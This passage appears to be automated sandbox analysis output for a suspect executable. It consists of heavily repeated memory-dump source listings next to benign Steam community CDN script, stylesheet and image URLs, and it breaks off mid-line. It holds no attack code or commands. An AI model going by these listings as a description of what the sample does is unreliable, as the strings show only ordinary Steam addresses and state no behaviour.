Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&a
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=XfYrwi9zUC4b&amp;l=
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=engli
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=47omfdMZRDiz&amp;l=engli
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=iGFW_JMULCcZ&amp;
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcD
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&amp
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&amp;l=engl
Source: 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&amp;l=
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=bpFp7zU77IKn&amp;
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=n4_f9JKDa7wP&
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascri
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 